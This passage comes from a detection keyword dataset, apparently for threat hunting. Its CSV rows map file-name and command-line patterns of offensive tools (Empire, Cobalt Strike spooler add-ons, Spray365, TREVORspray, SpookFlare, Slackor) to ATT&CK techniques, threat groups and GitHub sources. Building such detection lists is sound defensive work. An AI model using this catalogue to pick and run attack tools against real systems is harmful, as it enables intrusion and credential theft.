T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferRepeat*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*Spoofy/spoofy.py*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*SpookFlare*,offensive_tool_keyword,SpookFlare,SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.,T1027 - T1029 - T1218 - T1112,TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hlldz/SpookFlare,1,0,N/A,N/A,10,925,201,2019-05-08T09:03:45Z,2017-11-13T17:22:12Z -*spookflare.py*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*spool_sploit.py*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*spooler_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*SpoolSample.exe * *,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -*SpoolSample_v4.5_x64.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*SpoolSploit/*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*spoolsploit:latest*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*spoolss_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*spoolsystem inject*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*spoolsystem spawn*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*spoolsystem.cna*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x64.dl*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x64.dll*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x86.dl*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger.x86.dll*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*SpoolTrigger\SpoolTrigger.*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*spray* --recon *.* -u *.txt --threads 10*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*Spray365.git*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*spray365.py*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*spray365_results_*.json*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,1,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*Spray-AD *,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,0,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.cna*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.dll*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.exe*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD.sln*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*Spray-AD\Spray-AD*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,0,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*sprayhound -*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,0,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*sprayhound -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 